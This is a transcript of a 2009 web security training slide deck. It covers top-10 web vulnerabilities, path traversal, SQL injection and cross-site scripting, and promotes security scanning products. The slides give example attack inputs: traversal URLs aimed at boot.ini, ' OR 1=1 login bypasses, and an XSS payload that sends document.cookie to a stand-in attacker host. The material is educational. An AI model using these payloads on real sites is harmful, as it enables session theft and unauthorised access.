1 / 38

Web Security Overview

Web Security Overview. Web Security Overview. Lohika ASC team 2009 ad_asc@lohika.com . Web Security Overview. Agenda. The Evolution of Web Applications ……………...................3 Common Web Application Functions ………………………..5

neci
Download Presentation

Web Security Overview

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Web Security Overview Web Security Overview Lohika ASC team 2009 ad_asc@lohika.com

  2. Web Security Overview Agenda • The Evolution of Web Applications ……………...................3 • Common Web Application Functions ………………………..5 • Server/Browser Information Flow and Vulnerabilities ……...6 • The Security Aspects ………………………………………….8 • Web Security Assessment Main Stages……………………10 • Web Application Vulnerabilities - Top 10……………………14 • Path Manipulation Attack …………………………………….21 • Parameter Manipulation Attack ……………………………..25 • ASC Products Overview ………………………………….…36

  3. Web Security Overview The Evolution of Web Applications

  4. Web Security Overview The Evolution of Web Applications Rapid evolution of web applications: • No longer a set of static pages • Rely on multiple tech layers and concepts • to provide interactive content • Replacing desktop applications in many areas • Are used everywhere

  5. Web Security Overview Common Web Application Functions • 1. Social Networking • 2. Shopping • 3. Auctions • 4. Web mail • Potentially Not Secure • 5. Banking • 6 .Web logs • 7 .Gambling • 8 .Web Search • 9. Interactive information For an example: My Space – Samy Worm http://namb.la/popular/tech.html

  6. Web Security Overview Two-way information flow: Server  Browser • Auth Service • Browser • Web Service • External User • Firewall • HTTP Server • Database • Internal User • Internal • HTTP Server • Browser Server Infrastructure

  7. Web Security Overview Two-way information flow: Server  Browser • Auth Service • Browser • Web Service • External User Local File Include • Firewall • HTTP Server Parameter Tampering XSS CSRF • Database Remote File Inclusion XML Injection Path Traversal SQL Injection Forged Token • Internal User • Internal • HTTP Server • Browser Server Infrastructure

  8. Web Security Overview The Security Aspect • In recent years, Web application security has become a focal center for security experts. Application attacks are constantly on the rise, posing new risks for the organization. • Application security sometimes gets overlooked by • Dev, QA or Operations teams for various reasons: • Risks involved are underestimated / not fully realized • Lack of competence • Lack of time • Any business that relies on a vulnerable web application is potentially at risk of having a major business impact with serious implications.

  9. Web Security Overview The Security Aspect • This is a problem

  10. Web Security Overview Web Security Assessment main stages

  11. Web Security Overview Map the Application’s content

  12. 1. Identify functionality 2. Identify data entry points 3. Identify technologies Web Security Overview Analyze the Application Attack Vectors

  13. Web Security Overview Attack patterns and goals

  14. Web Security Overview Web Application Vulnerabilities Top 10 Injection Examples of injection flaws are SQL, XML, LDAP, HTTP header injection (cookies, requests), and OS command injections Attacks occur when untrusted data, such as a query, command or argument, is sent to an interpreter Vulnerable applications can be tricked into executing unintended commands or allowing the attacker to access, and modify, data Cross Site Scripting There are three types of XSS attacks: stored, reflected, and Dom based XSS attacks occur when an application allows data that is not validated or escaped properly to be sent to a web browser Malicious scripts are executed in the victim’s browser allowing the attacker to hijack the user’s session, steal cookies, deface web sites, redirect users to malicious web sites, and remote browser control

  15. Web Security Overview Web Application Vulnerabilities Top 10 (Continued) Broken Authentication and Session Management Users are impersonated due to leaks or flaws in the authentication process Attacks occur when a session ID is visible to others, timeouts are not properly set, SSL/TLS is not used, or any other flaw in the authentication scheme is detected Flaws used against one account may be replicated against an account with higher privileges Insecure Direct Object References Attack occurs when an authorized user can change a parameter value that refers to a system object that they are not authorized for Almost any reference that can be reached by URL to include: references to files, paths, database keys, reflection by class name (e.g. JDBC connector class) Remote referencing includes: Web Services, CORBA, RMI, RPC

  16. Web Security Overview Web Application Vulnerabilities Top 10 (Continued) Cross Site Request Forgery (CSRF) Attacker creates malicious code to generate a forged request that the attacker tricks the victim into submitting Forged requests can be hidden in image tags, XSS attacks and a number of other techniques CSRF attacks can complete any transactions that the victim is permitted to perform such as access data, transfer funds or make purchases Security Misconfiguration Attacker exploits unsecured pages, default accounts, unpatched flaws or any other vulnerability that could have be addressed by proper configuration These attacks can result in a complete system compromise

  17. Web Security Overview Web Application Vulnerabilities Top 10 (Continued) Failure to Restrict URL Access This attack takes place when an authorized user can simply change a URL to access a privileged page Attackers generally look for administrative functions to employ this attack on Links can be obtained from: hidden fields, client-side code, robots.txt, configuration files, static XML files, directory access Unvalidated Redirects and Forwards Unvalidated parameter allows an attacker to choose a destination page where they wish to send a victim to trick them into disclosing private information Victims trust these links because the link is to a valid site

  18. Web Security Overview Web Application Vulnerabilities Top 10 (Continued) Insecure Cryptographic Storage The most common reason for this attack is that data that should be encrypted is stored in cleartext Can result from the poor use of encryption algorithms such as using home grown algorithms, insecure use of strong algorithms or the continued use of proven weak algorithms The use of weak or unsalted hashes to protect passwords is another common flaw that leads to this risk Insufficient Transport Layer Protection Most commonly, this attack occurs when a site does not use SSL/TLS for pages that require authentication where an attacker can monitor network traffic to steal an authenticated user’s session cookie Poorly configured SSL certificates can lull a user into accepting warnings for legitimate sites only to be tricked into accepting a phishing site’s certificate Attacks can lead to account theft, phishing attacks and admin accounts being compromised

  19. Web Security Overview Path Manipulation attacks and Parameter Manipulation attacks

  20. Web Security Overview Attack Techniques • One of the most dangerous and most common attack techniques are:

  21. Web Security Overview Path manipulation: 1. Directory Indexing • Automatic directory listing/indexing is a web server function that lists all of the files within a requested directory. • The following information could be obtained based on directory indexing data: Note: if directory contain(index.html/home.html/default.htm) the normal base file is not present.

  22. Web Security Overview Path manipulation: 2. Path Truncation • Path truncation attacks are requests for known directories without filenames. • This may cause directory listings to be displayed Example: 1.Given the following URL http://www.site.com/folder1/folder2/file.asp 2.truncating the path to look for http://www.site.com/folder1/folder2/ 3.and http://www.site.com/folder1/ may cause the webserver to reveal directory contents or to cause unhandled exceptions.

  23. Web Security Overview Path manipulation: 3. Path Traversal • These attacks are expressions in the URI that will cause the Web server to display the • contents of files above the webroot Example: 1.Given the following URL http://www.site.com/folder1/../../../../../../../boot.ini 2.Or following http://www.site.com/getnews.php?name=../../../../../../boot.ini it can occurs while web application uses the string to specify a file location without first completely parsing out traversal characters

  24. Web Security Overview Path manipulation: 4. Predictable Resource location. Directory enumeration • Directory enumeration lists all directory paths and possibilities on the application server, • including hidden directories that could possibly contain sensitive information

  25. Web Security Overview Parameter manipulation: Where can we find the Entry Points of web application? • HTTP GET request with query parameters • HTTP POST request with parameters • HTTP Cookies • Custom HTTP headers

  26. Web Security Overview • Parameter manipulation: • 1. Abnormal input. parameter overflow • Abnormal input attack strings are composed of characters that can cause unhandled exceptions. • Unhandled exceptions often cause error messages to be displayed that disclose sensitive information about the application’s internal mechanics. • Source code may even be disclosed Example: 1.Given the following URL http://www.site.com/cgi-bin/process.pl?id=%00 (where %00 is poisonous null byte ) 2.Or following http://www.site.com/cgi-bin/process.pl?id=99999999999999999

  27. Web Security Overview Parameter manipulation: 2. Brute Force authentication attack. • The brute force attack is a method of obtaining a user's authentication credentials application’s internal mechanics. • Using brute force, attackers attempt combinations of the accepted character set in order to find a specific combination that gains access to the authorized area .

  28. Web Security Overview Parameter manipulation: 3. SQL injection Simple injection with ‘OR true’ construction: Example: SQL query: SELECT `id`,`login`,`pass` FROM `users` WHERE login=‘admin‘ AND pass=‘qwert’; • Identify the availability of SQL injection use Incorrectly filtered escape characters: This form of SQL injection occurs when user input is not filtered for escape characters and is then passed into a SQL statement. This results in the potential manipulation of the statements performed on the database by the end user of the application. Example: ?login=aaa'(get error: You have an error in your SQL syntax…) ?login=aaa‘ OR 1=1 OR ‘bbb(use “or 1=1” signatures) SQL query: SELECT `id`,`login`,`pass` FROM `users` WHERE login=‘aaa’ OR 1=1 OR ‘bbb’ AND pass=‘qwert’;

  29. Web Security Overview Parameter manipulation: 3. SQL injection

  30. Web Security Overview Parameter manipulation: 3. SQL injection Example: 1.Given the following URL http://www.site.com/login.php?name=Vlad&password=12345 2. After login the “Welcome Vlad to our site” message appears on the site page 3. What happens if user name will be following: http://www.site.com/login.php?name=anyuser’ OR 1=1 --&password=unknown 4. of course - SQL query: SELECT `id`,`login`,`pass` FROM `users` WHERE login=‘anyuser’ OR 1=1 --’ AND pass=‘unknown’; 5. You are logged under anyuser !!! <script>alert(document.cookie);</script>' or true#

  31. Web Security Overview Parameter manipulation: 5. Cross Site Scripting Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications which allow code injection by malicious web users into the web pages viewed by other users.

  32. Web Security Overview Parameter manipulation: 5. Cross Site Scripting Simple XSS Attack http://myserver.com/test.jsp?name=Stefan Example: <HTML> <Body> Welcome Stefan </Body> </HTML>

  33. Web Security Overview Parameter manipulation: 5. Cross Site Scripting http://myserver.com/welcome.jsp?name=<script>alert("Attacked")</script> <HTML> <Body> Welcome <script>alert("Attacked")</script> </Body> </HTML>

  34. Web Security Overview Parameter manipulation: 5. Cross Site Scripting Example: 6.Try to login under following user name: http://www.site.com/login.php?name=<script>alert(111);</script>’ OR ‘1=1#&password=… 7. After login the “Welcome <script>alert(111);</script>’ OR ‘1=1# to our site” message appears in html sourceof this page. As a result, The popup message box with “111” appears – it is XXS !!! 8. What happens if user name will be following: <script>alert(document.cookies);</script>’ OR =‘1 9. And what happens if user name will be following: <script> document.writeln("<imgsrc=http://myhackersite.com/?a=" + document.cookie + ">“ ); </script>’ OR 1=1#

  35. Web Security Overview ASC Products Overview

  36. Web Security Overview Application Security Center Product Overview WebInspect QAInspect Assessment Management Platform (AMP)

  37. Web Security Overview Security Center Product Overview – Entire Suite Security Inspect Security Inspect Security Inspect

  38. ? Web Security Overview Q. A.

More Related